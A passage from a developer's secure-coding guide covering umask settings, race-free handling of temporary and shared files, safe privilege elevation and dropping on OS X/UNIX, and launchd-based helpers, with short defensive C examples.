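 * with errno set (EEXIST when the name is already taken, including by a
 * symbolic link). Note that umask is process-wide, so this sketch is not
 * safe to call concurrently from several threads. */
int create_exclusive(const char *path)
{
    /* Mask out all group and other permissions: equivalent to 077. */
    mode_t old_mask = umask(S_IRWXG | S_IRWXO);

    /* O_EXCL makes the existence check and the creation one atomic step. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR | S_IWUSR);

    int saved_errno = errno;    /* preserve open's error for the caller */
    umask(old_mask);
    errno = saved_errno;
    return fd;
}
```

If the call fails with EEXIST, the safe response is to report the problem or pick a different name, not to delete the existing file and retry under the same name.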
The file creation mask is a bitmask that alters the default permissions of all new files and directories created by your process. This bitmask is typically specified in octal notation, which means that it must begin with a zero (not 0x).

For example, if you set the file creation mask to 022, any new files created by your process will have rw-r--r-- permissions because the write permission bits are masked out. Similarly, any new directories will have rwxr-xr-x permissions.

Note: New files never have the execute bit set. Directories, however, do. Therefore, you should generally mask out execute permission when masking out read permission unless you have a specific reason to allow users to traverse a directory without seeing its contents.

To limit access to any new files or directories so that only the user can access them, set the file creation mask to 077.

You can also mask out permissions in such a way that they apply to the user, though this is rare. For example, to create a file that no one can write or execute, and that only the user can read, you could set the file creation mask to 0377. This is not particularly useful, but it is possible.

There are several ways to set the file creation mask:

In C code:
In C code, you can set the file creation mask globally using the umask system call. You can also pass the desired permission mode to the open or mkdir system call when creating a file or directory; the file creation mask is then applied to that mode.

Note: For maximum portability when writing C code, you should always create your masks using the file mode constants defined in <sys/stat.h>. For example:

    umask(S_IRWXG|S_IRWXO);

In shell scripts:
In shell scripts, you set the file creation mask by using the umask shell builtin. This is documented in the manual pages for sh or csh.
For example:

    umask 0077;

As an added security bonus, when a process calls another process, the new process inherits the parent process’s file creation mask. Thus, if your process starts another process that creates a file without resetting the file creation mask, that file similarly will not be accessible to other users on the system. This is particularly useful when writing shell scripts.

For more information on the file creation mask, see the manual page for umask and Viega and McGraw, Building Secure Software, Addison Wesley, 2002. For a particularly lucid explanation of the use of a file creation mask, see http://web.archive.org/web/20090517063338/http://www.sun.com/bigadmin/content/submitted/umask_permissions.html?.

Before you read a file (but after opening it), make sure it has the owner and permissions you expect (using fstat). Be prepared to fail gracefully (rather than hanging) if it does not.

Here are some guidelines to help you avoid time-of-check–time-of-use vulnerabilities when working with files in publicly writable directories. For more detailed discussions, especially for C code, see Viega and McGraw, Building Secure Software, Addison Wesley, 2002, and Wheeler, Secure Programming for Linux and Unix HOWTO, available at http://www.dwheeler.com/secure-programs/.

● If at all possible, avoid creating temporary files in a shared directory, such as /tmp, or in directories owned by the user. If anyone else has access to your temporary file, they can modify its content, change its ownership or mode, or replace it with a hard or symbolic link. It’s much safer to either not use a temporary file at all (use some other form of interprocess communication) or keep temporary files in a directory you create and to which only your process (acting as your user) has access.

● If your file must be in a shared directory, give it a unique (and randomly generated) filename (you can use the C function mkstemp to do this), and never close and reopen the file.
If you close such a file, an attacker can potentially find it and replace it before you reopen it.

Here are some public directories that you can use:

● ~/Library/Caches/TemporaryItems
When you use this subdirectory, you are writing to the user’s own home directory, not some other user’s directory or a system directory. If the user’s home directory has the default permissions, it can be written to only by that user and root. Therefore, this directory is not as susceptible to attack from outside, nonprivileged users as some other directories might be.

● /var/run
This directory is used for process ID (pid) files and other system files needed just once per startup session. This directory is cleared out each time the system starts up.

● /var/db
This directory is used for databases accessible to system processes.

● /tmp
This directory is used for general shared temporary storage. It is cleared out each time the system starts up.

● /var/tmp
This directory is used for general shared temporary storage. Although you should not count on data stored in this directory being permanent, unlike /tmp, the /var/tmp directory is currently not cleared out on reboot.

For maximum security, you should always create temporary subdirectories within these directories, set appropriate permissions on those subdirectories, and then write files into those subdirectories.

The following sections give some additional hints on how to follow these principles when you are using POSIX-layer C code, Carbon, and Cocoa calls.

Working with Publicly Writable Files Using POSIX Calls

If you need to open a preexisting file to modify it or read from it, you should check the file’s ownership, type, and permissions, and the number of links to the file before using it. To safely open a file for reading, for example, you can use the following procedure:

1.
Call the open function and save the file descriptor. Pass the O_NOFOLLOW flag to ensure that open does not follow symbolic links.
2. Using the file descriptor, call the fstat function to obtain the stat structure for the file you just opened.
3. Check the user ID (UID) and group ID (GID) of the file to make sure they are correct.
4. Check the file's mode flags to make sure that it is a normal file, not a FIFO, device file, or other special file. Specifically, if the stat structure is named st, then the value of (st.st_mode & S_IFMT) should be equal to S_IFREG.
5. Check the read, write, and execute permissions for the file to make sure they are what you expect.
6. Check that there is only one hard link to the file.
7. Pass around the open file descriptor for later use rather than passing the path.

Note that you can avoid all the status checking by using a secure directory instead of a public one to hold your program’s files.

Table 4-1 shows some functions to avoid, and the safer equivalent functions to use instead, to prevent race conditions when you are creating files in a public directory.
Table 4-1 C file functions to avoid and to use

Avoid: fopen returns a file pointer; automatically creates the file if it does not exist but returns no error if the file does exist.
Use instead: open returns a file descriptor; creates a file and returns an error if the file already exists when the O_CREAT and O_EXCL options are used.

Avoid: chmod takes a file path.
Use instead: fchmod takes a file descriptor.

Avoid: chown takes a file path and follows symbolic links.
Use instead: fchown takes a file descriptor and does not follow symbolic links.

Avoid: stat takes a file path and follows symbolic links.
Use instead: lstat takes a file path but does not follow symbolic links; fstat takes a file descriptor and returns information about an open file.

Avoid: mktemp generates a unique temporary filename and returns it as a file path; it does not create the file, so you need to create and open the file in another call.
Use instead: mkstemp creates a temporary file with a unique name, opens it for reading and writing, and returns a file descriptor.

Working with Publicly Writable Files Using Carbon

If you are using the Carbon File Manager to create and open files, you should be aware of how the File Manager accesses files.

● The file specifier FSSpec structure uses a path to locate files, not a file descriptor. Functions that use an FSSpec file specifier are deprecated and should not be used in any case.

● The file reference FSRef structure uses a path to locate files and should be used only if your files are in a safe directory, not in a publicly accessible directory. Functions that use an FSRef include FSGetCatalogInfo, FSSetCatalogInfo, FSCreateFork, and others.

● The File Manager creates and opens files in separate operations. The create operation fails if the file already exists. However, none of the file-creation functions return a file descriptor.
If you’ve obtained the file reference of a directory (from the FSFindFolder function, for example), you can use the FSRefMakePath function to obtain the directory’s path name. However, be sure to check the function result, because if the FSFindFolder function fails, it returns a null string. If you don’t check the function result, you might end up trying to create a temporary file with a pathname formed by appending a filename to a null string.

Working with Publicly Writable Files Using Cocoa

The NSString and NSData classes have writeToFile:atomically: methods designed to minimize the risk of data loss when writing to a file. These methods write first to a temporary file, and then, when they’re sure the write is successful, they replace the written-to file with the temporary file. This is not always an appropriate thing to do when working in a public directory or a user’s home directory, because there are a number of path-based file operations involved. Instead, initialize an NSFileHandle object with an existing file descriptor and use NSFileHandle methods to write to the file, as mentioned above. The following code, for example, uses the mkstemp function to create a temporary file and obtain a file descriptor, which it then uses to initialize NSFileHandle:

    fd = mkstemp(tmpfile); // check return for -1, which indicates an error
    NSFileHandle *myhandle = [[NSFileHandle alloc] initWithFileDescriptor:fd];

Working with Publicly Writable Files in Shell Scripts

Scripts must follow the same general rules as other programs to avoid race conditions. There are a few tips you should know to help make your scripts more secure.

First, when writing a script, set the temporary directory ($TMPDIR) environment variable to a safe directory. Even if your script doesn’t directly create any temporary files, one or more of the routines you call might create one, which can be a security vulnerability if it’s created in an insecure directory.
See the manual pages for setenv for information on changing the temporary directory environment variable. For the same reason, set your process’s file creation mask (umask) to restrict access to any files that might be created by routines run by your script (see “Securing File Operations” (page 47) for more information on the umask).

It’s also a good idea to use the dtruss command on a shell script so you can watch every file access to make sure that no temporary files are created in an insecure location. See the manual pages for dtrace and dtruss for more information.

Do not redirect output using the operators > or >> to a publicly writable location. These operators do not check to see whether the file already exists, and they follow symbolic links.

Instead, pass the -d flag to the mktemp command to create a subdirectory to which only you have access. It’s important to check the result to make sure the command succeeded. If you do all your file operations in this directory, you can be fairly confident that no one with less than root access can interfere with your script. For more information, see the manual page for mktemp.

Do not use the test command (or its left bracket ([) equivalent) to check for the existence of a file or other status information for the file before writing to it. Doing so always results in a race condition; that is, it is possible for an attacker to create, write to, alter, or replace the file before you start writing. See the manual page for test for more information.

For a more in-depth look at security issues specific to shell scripts, read “Shell Script Security” in Shell Scripting Primer.

Other Tips

Here are a few additional things to be aware of when working with files:

● Before you attempt a file operation, make sure it is safe to perform the operation on that file.
For example, before attempting to read a file (but after opening it), you should make sure that it is not a FIFO or a device special file.

● Just because you can write to a file, that doesn’t mean you should write to it. For example, the fact that a directory exists doesn’t mean you created it, and the fact that you can append to a file doesn’t mean you own the file or no one else can write to it.

● OS X can perform file operations on files in several different file systems. Some operations can be done only on certain systems. For example, certain file systems honor setuid files when executed from them and some don’t. Be sure you know what file system you’re working with and what operations can be carried out on that system.

● Local pathnames can point to remote files. For example, the path /volumes/foo might actually be someone’s FTP server rather than a locally-mounted volume. Just because you’re accessing something by a pathname, that does not guarantee that it’s local or that it should be accessed.

● A user can mount a file system anywhere they have write access and own the directory. In other words, almost anywhere a user can create a directory, they can mount a file system on top of it. Because this can be done remotely, an attacker running as root on a remote system could mount a file system into your home directory. Files in that file system would appear to be files in your home directory owned by root.
For example, /tmp/foo might be a local directory, or it might be the root mount point of a remotely mounted file system. Similarly, /tmp/foo/bar might be a local file, or it might have been created on another machine and be owned by root over there. Therefore, you can’t trust files based only on ownership, and you can’t assume that setting the UID to 0 was done by someone you trust.
To tell whether the file is mounted locally, use the fstat call to check the device ID. If the device ID is different from that of files you know to be local, then you’ve crossed a device boundary.

● Remember that users can read the contents of executable binaries just as easily as the contents of ordinary files. For example, the user can run strings(1) to quickly see a list of (ostensibly) human-readable strings in your executable.

● When you fork a new process, the child process inherits all the file descriptors from the parent; descriptors that have the close-on-exec flag set are closed only when the child executes a new program. If you fork and execute a child process and drop the child process’s privileges so its real and effective IDs are those of some other user (to avoid running that process with elevated privileges), then that user can use a debugger to attach to the child process. They can then run arbitrary code from that running process. Because the child process inherited all the file descriptors from the parent, the user now has access to every file opened by the parent process. See “Inheriting File Descriptors” (page 61) for more information on this type of vulnerability.

Elevating Privileges Safely

By default, applications run as the currently logged in user. Different users have different rights when it comes to accessing files, changing systemwide settings, and so on, depending on whether they are admin users or ordinary users. Some tasks require additional privileges above and beyond what even an admin user can do by default. An application or other process with such additional rights is said to be running with elevated privileges. Running code with root or administrative privileges can intensify the dangers posed by security vulnerabilities. This chapter explains the risks, provides alternatives to privilege elevation, and describes how to elevate privileges safely when you can’t avoid it.
Note: Elevating privileges is not allowed in applications submitted to the Mac App Store (and is not possible in iOS).

Circumstances Requiring Elevated Privileges

Regardless of whether a user is logged in as an administrator, a program might have to obtain administrative or root privileges in order to accomplish a task. Examples of tasks that require elevated privileges include:

● manipulating file permissions and ownership
● creating, reading, updating, or deleting system and user files
● opening privileged ports (those with port numbers less than 1024) for TCP and UDP connections
● opening raw sockets
● managing processes
● reading the contents of virtual memory
● changing system settings
● loading kernel extensions

If you have to perform a task that requires elevated privileges, you must be aware that if there are any security vulnerabilities in your program, an attacker can obtain elevated privileges as well, and would then be able to perform any of the operations listed above.

The Hostile Environment and the Principle of Least Privilege

Any program can come under attack, and probably will. By default, every process runs with the privileges of the user or process that started it. Therefore, if a user has logged on with restricted privileges, your program should run with those restricted privileges. This effectively limits the amount of damage an attacker can do, even if he successfully hijacks your program into running malicious code. Do not assume that the user is logged in with administrator privileges; you should be prepared to run a helper application with elevated privileges if you need them to accomplish a task. However, keep in mind that, if you elevate your process’s privileges to run as root, an attacker can gain those elevated privileges and potentially take over control of the whole system.
Note: Although in certain circumstances it’s possible to mount a remote attack over a network, for the most part the vulnerabilities discussed here involve malicious code running locally on the target computer.

If an attacker uses a buffer overflow or other security vulnerability (see “Types of Security Vulnerabilities” (page 11)) to execute code on someone else’s computer, they can generally run their code with whatever privileges the logged-in user has. If an attacker can gain administrator privileges, they can elevate to root privileges and gain access to any data on the user’s computer. Therefore, it is good security practice to log in as an administrator only when performing the rare tasks that require admin privileges. Because the default setting for OS X is to make the computer’s owner an administrator, you should encourage your users to create a separate non-admin login and to use that for their everyday work. In addition, if possible, you should not require admin privileges to install your software.

The idea of limiting risk by limiting access goes back to the “need to know” policy followed by government security agencies (no matter what your security clearance, you are not given access to information unless you have a specific need to know that information). In software security, this policy is often termed “the principle of least privilege,” first formally stated in 1975: “Every program and every user of the system should operate using the least set of privileges necessary to complete the job.” (Saltzer, J.H. and Schroeder, M.D., “The Protection of Information in Computer Systems,” Proceedings of the IEEE, vol. 63, no. 9, Sept 1975.)

In practical terms, the principle of least privilege means you should avoid running as root, or, if you absolutely must run as root to perform some task, you should run a separate helper application to perform the privileged task (see “Factoring Applications” (page 69)).
By running with the least privilege possible, you:

● Limit damage from accidents and errors, including maliciously introduced accidents and errors
● Reduce interactions of privileged components, and therefore reduce unintentional, unwanted, and improper uses of privilege (side effects)

Keep in mind that, even if your code is free of errors, vulnerabilities in any libraries your code links in can be used to attack your program. For example, no program with a graphical user interface should run with privileges because the large number of libraries used in any GUI application makes it virtually impossible to guarantee that the application has no security vulnerabilities.

There are a number of ways an attacker can take advantage of your program if you run as root. Some possible approaches are described in the following sections.

Launching a New Process

Because any new process runs with the privileges of the process that launched it, if an attacker can trick your process into launching his code, the malicious code runs with the privileges of your process. Therefore, if your process is running with root privileges and is vulnerable to attack, the attacker can gain control of the system. There are many ways an attacker can trick your code into launching malicious code, including buffer overflows, race conditions, and social engineering attacks (see “Types of Security Vulnerabilities” (page 11)).

Executing Command-Line Arguments

Because all command-line arguments, including the program name (argv[0]), are under the control of the user, you should not use the command line to execute any program without validating every parameter, including the name.
If you use the command line to re-execute your own code or execute a helper program, for example, a malicious user might have substituted his own code with that program name, which you are now executing with your privileges.

Inheriting File Descriptors

When you create a new process, the child process inherits its own copy of the parent process’s file descriptors (see the manual page for fork(2)). Therefore, if you have a handle on a file, network socket, shared memory, or other resource that’s pointed to by a file descriptor and you fork off a child process, you must either close the file descriptor or make sure that the child process cannot be tampered with. Otherwise, a malicious user can use the subprocess to tamper with the resources referenced by the file descriptors.

For example, if you open a password file and don’t close it before forking a process, the new subprocess has access to the password file.

To set a file descriptor so that it closes automatically when you execute a new process (such as by using the execve system call), use the fcntl(2) call to set the close-on-exec flag. You must set this flag individually for each file descriptor; there’s no way to set it for all.

Abusing Environment Variables

Most libraries and utilities use environment variables. Sometimes environment variables can be attacked with buffer overflows or by inserting inappropriate values. If your program links in any libraries or calls any utilities, your program is vulnerable to attacks through any such problematic environment variables. If your program is running as root, the attacker might be able to bring down or gain control of the whole system in this way. Examples of environment variables in utilities and libraries that have been attacked in the past include:

1.
The dynamic loader: LD_LIBRARY_PATH, DYLD_LIBRARY_PATH are often misused, causing unwanted side effects.
2. libc: MallocLogFile [CVE-2005-2748 (corrected in Apple Security Update 2005-008)]
3. Core Foundation: CF_CHARSET_PATH [CVE-2005-0716 (corrected in Apple Security Update 2005-003)]
4. perl: PERLLIB, PERL5LIB, PERL5OPT [CVE-2005-4158]

Environment variables are also inherited by child processes. A child cannot change its parent’s environment, but it starts with whatever values the parent passes along. Code that runs in a forked or executed child should therefore validate the values of all environment variables before it uses them, in case they were altered before the child started (whether inadvertently or through an attack by a malicious user).

Modifying Process Limits

You can use the setrlimit call to limit the consumption of system resources by a process. For example, you can set the largest size of file the process can create, the maximum amount of CPU time the process can consume, and the maximum amount of physical memory a process may use. These process limits are inherited by child processes.

In order to prevent an attacker from taking advantage of open file descriptors, programs that run with elevated privileges often close all open file descriptors when they start up. However, if an attacker can use setrlimit to alter the file descriptor limit, he can fool the program into leaving some of the files open. Those files are then vulnerable.

Similarly, a vulnerability was reported for a version of Linux that made it possible for an attacker, by decreasing the maximum file size, to limit the size of the /etc/passwd and /etc/shadow files. Then, the next time a utility accessed one of these files, it truncated the file, resulting in a loss of data and denial of service. [CVE-2002-0762]
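As a minimal sketch of the setrlimit call discussed under “Modifying Process Limits,” the following C helper lowers one resource limit and checks every return value. The helper name lower_limit is hypothetical and the limit values in the usage note are purely illustrative; nothing here comes from this guide beyond the use of setrlimit itself.

```c
#include <assert.h>
#include <sys/resource.h>

/*
 * Set both the soft and the hard limit of one resource to new_max,
 * clamped to the current hard limit (an unprivileged process is not
 * allowed to raise its hard limit).
 * Returns 0 on success, -1 on failure (errno is set by the failing call).
 * The name lower_limit is hypothetical, used only for this sketch.
 */
int lower_limit(int resource, rlim_t new_max)
{
    struct rlimit rl;

    /* Read the limits this process inherited from its parent. */
    if (getrlimit(resource, &rl) == -1)
        return -1;

    /* Never ask for more than the current hard limit allows. */
    if (rl.rlim_max != RLIM_INFINITY && new_max > rl.rlim_max)
        new_max = rl.rlim_max;

    rl.rlim_cur = new_max;
    rl.rlim_max = new_max;   /* lowering the hard limit cannot be undone
                                by an unprivileged process */
    return setrlimit(resource, &rl);
}
```

A process might call lower_limit(RLIMIT_CPU, 3600) or lower_limit(RLIMIT_FSIZE, (rlim_t)1 << 30) before launching a child, since the child inherits the limits. Because limits are inherited in the same way from whoever launched your own program, privileged code should read them with getrlimit rather than assume default values.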
File Operation Interference

If you’re running with elevated privileges in order to write or read files in a world-writable directory or a user’s directory, you must be aware of time-of-check–time-of-use problems; see “Time of Check Versus Time of Use” (page 44).

Avoiding Elevated Privileges

In many cases, you can accomplish your task without needing elevated privileges. For example, suppose you need to configure the environment (add a configuration file to the user’s home directory or modify a configuration file in the user’s home directory) for your application. You can do this from an installer running as root (the installer command requires administrative privileges; see the manual page for installer(8)). However, if you have the application configure itself, or check whether configuration is needed when it starts up, then you don’t need to run as root at all.

An example of using an alternate design in order to avoid running with elevated privileges is given by the BSD ps command, which displays information about processes that have controlling terminals. Originally, BSD used the setgid bit to run the ps command with a group ID of kmem, which gave it privileges to read kernel memory. More recent implementations of the ps command use the sysctl call to read the information they need, removing the requirement that ps run with any special privileges.

Running with Elevated Privileges

If you do need to run code with elevated privileges, there are several approaches you can take:

● You can run a daemon with elevated privileges that you call on when you need to perform a privileged task. The preferred method of launching a daemon is to use the launchd daemon (see “launchd” (page 66)). It is easier to use launchd to launch a daemon and easier to communicate with a daemon than it is to fork your own privileged process.

● You can use the authopen command to read, create, or update a file (see “authopen” (page 65)).
● You can set the setuid and setgid bits for the executable file of your code, and set the owner and group of the file to the privilege level you need; for example, you can set the owner to root and the group to wheel. Then when the code is executed, it runs with the elevated privileges of its owner and group rather than with the privileges of the process that executed it. (See the “Permissions” section in the “Security Concepts” chapter in Security Overview.) This technique is often used to execute the privileged code in a factored application (see “Factoring Applications” (page 69)). As with other privileged code, you must be very sure that there are no vulnerabilities in your code and that you don’t link in any libraries or call any utilities that have vulnerabilities.
If you fork off a privileged process, you should terminate it as soon as it has accomplished its task (see “Factoring Applications” (page 69)). Although architecturally this is often the best solution, it is very difficult to do correctly, especially the first time you try. Unless you have a lot of experience with forking off privileged processes, you might want to try one of the other solutions first.

● You can use a BSD system call to change privilege level (see “Calls to Change Privilege Level” (page 64)). These calls have confusing semantics. You must be careful to use them correctly, and it’s very important to check the return values of these calls to make sure they succeeded.
Note that in general, unless your process was initially running as root, it cannot elevate its privilege with these calls. However, a process running as root can discard (temporarily or permanently) those privileges. Any process can change from acting on behalf of one group to another (within the set of groups to which it belongs).
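To illustrate the last approach, here is a minimal C sketch of permanently discarding setuid or setgid privileges and reverting to the real IDs of the user who launched the program. The function name drop_privileges_permanently is hypothetical. The sketch drops the group ID before the user ID, because once the UID has changed the process may no longer be allowed to change its GID, and it checks every return value. Because the semantics of these calls differ among UNIX-based systems, the final check only reports whether the old IDs can be regained; on some systems the saved IDs may survive these calls, in which case the function returns -1 rather than pretending that the drop worked.

```c
#include <assert.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Permanently give up set-user-ID and set-group-ID privileges and
 * revert to the real IDs of the invoking user.
 * Returns 0 if the privileges are gone, -1 otherwise; on -1 the caller
 * should treat the process as still privileged and exit.
 * The function name is hypothetical, used only for this sketch.
 */
int drop_privileges_permanently(void)
{
    const uid_t ruid = getuid();
    const uid_t old_euid = geteuid();
    const gid_t rgid = getgid();
    const gid_t old_egid = getegid();

    /* Drop the group ID first, while we may still be allowed to. */
    if (setgid(rgid) == -1)
        return -1;
    if (setuid(ruid) == -1)
        return -1;

    /* Never assume the calls worked: confirm the effective IDs. */
    if (getegid() != rgid || geteuid() != ruid)
        return -1;

    /* For a non-root user, regaining the old IDs must now fail. */
    if (ruid != 0) {
        if (old_egid != rgid && setegid(old_egid) != -1)
            return -1;
        if (old_euid != ruid && seteuid(old_euid) != -1)
            return -1;
    }
    return 0;
}
```

A program would typically call this function immediately after finishing its privileged work and exit if it returns -1. A daemon that starts as root and switches to a different, dedicated user would also need to reset its supplementary groups (see setgroups(2)), which this sketch does not attempt.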
Calls to Change Privilege Level

There are several calls you can use to change the privilege level of a program. The semantics of these calls are tricky, and vary depending on the operating system on which they’re used.

Important: If you are running with both a group ID (GID) and user ID (UID) that are different from those of the user, you have to drop the GID before dropping the UID. Once you’ve changed the UID, you may no longer have sufficient privileges to change the GID.

Important: As with every security-related operation, you must check the return values of your calls to setuid, setgid, and related routines to make sure they succeeded. Otherwise you might still be running with elevated privileges when you think you have dropped privileges.

For more information on permissions, see the “Permissions” section in the “Security Concepts” chapter in Security Overview. For information on setuid and related calls, see Setuid Demystified by Chen, Wagner, and Dean (Proceedings of the 11th USENIX Security Symposium, 2002), available at http://www.usenix.org/publications/library/proceedings/sec02/full_papers/chen/chen.pdf and the manual pages for setuid(2), setreuid(2), setregid(2), and setgroups(2). The setuid(2) manual page includes information about seteuid, setgid, and setegid as well.

Here are some notes on the most commonly used system calls for changing privilege level:

● The setuid function sets the real and effective user IDs and the saved user ID of the current process to a specified value. The setuid function is the most confusing of the UID-setting system calls. Not only does the permission required to use this call differ among different UNIX-based systems, but the action of the call differs among different operating systems and even between privileged and unprivileged processes.
If you are trying to set the effective UID, you should use the seteuid function instead.

● The setreuid function modifies the real UID and effective UID, and in some cases, the saved UID. The permission required to use this call differs among different UNIX-based systems, and the rule by which the saved UID is modified is complicated. For this function as well, if your intent is to set the effective UID, you should use the seteuid function instead.

● The seteuid function sets the effective UID, leaving the real UID and saved UID unchanged. In OS X, the effective user ID may be set to the value of the real user ID or of the saved set-user-ID. (In some UNIX-based systems, this function allows you to set the EUID to any of the real UID, saved UID, or EUID.) Of the functions available on OS X that set the effective UID, the seteuid function is the least confusing and the least likely to be misused.

● The setgid function acts similarly to the setuid function, except that it sets group IDs rather than user IDs. It suffers from the same shortcomings as the setuid function; use the setegid function instead.

● The setregid function acts similarly to the setreuid function, with the same shortcomings; use the setegid function instead.

● The setegid function sets the effective GID. This function is the preferred call to use if you want to set the EGID.

Avoiding Forking Off a Privileged Process

There are a couple of facilities you might be able to use to avoid forking off a privileged helper application. The authopen command lets you obtain temporary rights to create, read, or update a file. You can use the launchd daemon to start a process with specified privileges and a known environment.

authopen

When you run the authopen command, you provide the pathname of the file that you want to access. There are options for reading the file, writing to the file, and creating a new file.
Before carrying out any of these operations, the authopen command requests authorization from the system security daemon, which authenticates the user (through a password dialog or other means) and determines whether the user has sufficient rights to carry out the operation. See the manual page for authopen(1) for the syntax of this command.

launchd

Starting with OS X v10.4, the launchd daemon is used to launch daemons and other programs automatically, without user intervention. (If you need to support systems running versions of the OS earlier than OS X v10.4, you can use startup items.)

The launchd daemon can launch both systemwide daemons and per-user agents, and can restart those daemons and agents after they quit if they are still needed. You provide a configuration file that tells launchd the level of privilege with which to launch your routine.

You can also use launchd to launch a privileged helper. By factoring your application into privileged and unprivileged processes, you can limit the amount of code running as the root user (and thus the potential attack surface). Be sure that you do not request higher privilege than you actually need, and always drop privilege or quit execution as soon as possible.

There are several reasons to use launchd in preference to writing a daemon running as the root user or a factored application that forks off a privileged process:

● Because launchd launches daemons on demand, your daemon need not worry about whether other services are available yet. When it makes a request for one of those services, the service gets started automatically in a manner that is transparent to your daemon.
● Because launchd itself runs as the root user, if your only reason for using a privileged process is to run a daemon on a low-numbered port, you can let launchd open that port on your daemon’s behalf and pass the open socket to your daemon, thus eliminating the need for your code to run as the root user.

● Because launchd can launch a routine with elevated privileges, you do not have to set the setuid or setgid bits for the helper tool. Any routine that has the setuid or setgid bit set is likely to be a target for attack by malicious users.

● A privileged routine started by launchd runs in a controlled environment that can’t be tampered with. If you launch a helper tool that has the setuid bit set, it inherits much of the launching application’s environment, including:
    ● Open file descriptors (unless their close-on-exec flag is set).
    ● Environment variables (unless you use posix_spawn, posix_spawnp, or an exec variant that takes an explicit environment argument).
    ● Resource limits.
    ● The command-line arguments passed to it by the calling process.
    ● Anonymous shared memory regions (unattached, but available to reattach, if desired).
    ● Mach port rights.
There are probably others. It is much safer to use launchd, which completely controls the launch environment.

● It’s much easier to understand and verify the security of a protocol between your controlling application and a privileged daemon than to handle the interprocess communication needed for a process you forked yourself. When you fork a process, it inherits its environment from your application, including file descriptors and environment variables, which might be used to attack the process (see “The Hostile Environment and the Principle of Least Privilege” (page 60)). You can avoid these problems by using launchd to launch a daemon.
● It’s easier to write a daemon and launch it with launchd than to write factored code and fork off a separate process.
● Because launchd is a critical system component, it receives a lot of peer review by in-house developers at Apple. It is less likely to contain security vulnerabilities than most production code.
● The launchd.plist file includes key-value pairs that you can use to limit the system services (such as memory, number of files, and CPU time) that the daemon can use.

For more information on launchd, see the manual pages for launchd, launchctl, and launchd.plist, and Daemons and Services Programming Guide. For more information about startup items, see Daemons and Services Programming Guide.

Limitations and Risks of Other Mechanisms

In addition to launchd, the following less desirable methods can be used to obtain elevated privileges. In each case, you must understand the limitations and risks posed by the method you choose.

● setuid
  If an executable's setuid bit is set, the program runs as whatever user owns the executable regardless of which process launches it. There are two approaches to using setuid to obtain root (or another user’s) privileges while minimizing risk:
    ● Launch your program with root privileges, perform whatever privileged operations are necessary immediately, and then permanently drop privileges.
    ● Launch a setuid helper tool that runs only as long as necessary and then quits.
  If the operation you are performing needs a group privilege or user privilege other than root, you should launch your program or helper tool with that privilege only, not with root privilege, to minimize the damage if the program is hijacked.
  It’s important to note that if you are running with both a group ID (GID) and user ID (UID) that are different from those of the user, you have to drop the GID before dropping the UID. Once you’ve given up the privileged UID, you no longer have permission to change the GID.
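The ordering rule can be illustrated with a minimal C sketch. It assumes a POSIX system and a process that starts with elevated privileges; the function name drop_privileges is hypothetical and not part of any Apple API, and the sketch does not deal with supplementary groups.

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: permanently switch to target_uid/target_gid.
 * Returns 0 on success and -1 on any failure. */
int drop_privileges(uid_t target_uid, gid_t target_gid)
{
    /* Drop the group first: after the UID changes, the process may
     * no longer be permitted to change its GID. */
    if (setgid(target_gid) != 0) {
        perror("setgid");
        return -1;
    }
    if (setuid(target_uid) != 0) {
        perror("setuid");
        return -1;
    }

    /* Do not rely on the return values alone: confirm that the real
     * and effective IDs are what was requested. */
    if (getgid() != target_gid || getegid() != target_gid ||
        getuid() != target_uid || geteuid() != target_uid) {
        return -1;
    }

    /* If the target is not root, regaining root must now fail. */
    if (target_uid != 0 && setuid(0) == 0) {
        return -1;
    }
    return 0;
}
```

A caller would typically treat a nonzero return as fatal and exit rather than continue with partially dropped privileges.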
  As with every security-related operation, you must check the return values of your calls to setuid, setgid, and related routines to make sure they succeeded.
  For more information about the use of the setuid bit and related routines, see “Elevating Privileges Safely” (page 59).
● SystemStarter
  When you put an executable in the /Library/StartupItems directory, it is started by the SystemStarter program at boot time. Because SystemStarter runs with root privileges, you can start your program with any level of privilege you wish. Be sure to use the lowest privilege level that you can use to accomplish your task, and to drop privilege as soon as possible.
  Startup items run daemons with root privilege in a single global session; these processes serve all users. For OS X v10.4 and later, the use of startup items is deprecated; use the launchd daemon instead. For more information on startup items and startup item privileges, see “Startup Items” in Daemons and Services Programming Guide.
● AuthorizationExecuteWithPrivileges
  The Authorization Services API provides the AuthorizationExecuteWithPrivileges function, which launches a privileged helper as the root user.
  Although this function can execute any process temporarily with root privileges, it is not recommended except for installers that have to be able to run from CDs and self-repairing setuid tools. See Authorization Services Programming Guide for more information.
● xinetd
  In earlier versions of OS X, the xinetd daemon was launched with root privileges at system startup and subsequently launched internet services daemons when they were needed. The xinetd.conf configuration file specified the UID and GID of each daemon started and the port to be used by each service.
  Starting with OS X v10.4, you should use launchd to perform the services formerly provided by xinetd.
  See Daemons and Services Programming Guide for information about converting from xinetd to launchd. See the manual pages for xinetd(8) and xinetd.conf(5) for more information about xinetd.
● Other
  If you are using some other method to obtain elevated privilege for your process, you should switch to one of the methods described here and follow the cautions described in this chapter and in “Elevating Privileges Safely” (page 59).

Factoring Applications

If you’ve read this far and you’re still convinced you need to factor your application into privileged and nonprivileged processes, this section provides some tips and sample code. In addition, see Authorization Services Programming Guide for more advice on the use of Authorization Services and the proper way to factor an application.

As explained in the Authorization Services documentation, it is very important that you check the user’s rights to perform the privileged operation, both before and after launching your privileged helper tool. Your helper tool, owned by root and with the setuid bit set, has sufficient privileges to perform whatever task it has to do. However, if the user doesn’t have the rights to perform this task, you shouldn’t launch the tool and, if the tool gets launched anyway, the tool should quit without performing the task.

Your nonprivileged process should first use Authorization Services to determine whether the user is authorized and to authenticate the user if necessary (this is called preauthorizing; see Listing 5-1 (page 70)). Then launch your privileged process. The privileged process then should authorize the user again, before performing the task that requires elevated privileges; see Listing 5-2 (page 71). As soon as the task is complete, the privileged process should terminate.
In determining whether a user has sufficient privileges to perform a task, you should use rights that you have defined and put into the policy database yourself. If you use a right provided by the system or by some other developer, the user might be granted authorization for that right by some other process, thus gaining privileges to your application or access to data that you did not authorize or intend. For more information about policies and the policy database, see the section “The Policy Database” in the “Authorization Concepts” chapter of Authorization Services Programming Guide.

In the code samples shown here, the task that requires privilege is killing a process that the user does not own.

Example: Preauthorizing

If a user tries to kill a process that he doesn’t own, the application has to make sure the user is authorized to do so. The following numbered items correspond to comments in the code sample:
1. If the process is owned by the user, and the process is not the window server or the login window, go ahead and kill it.
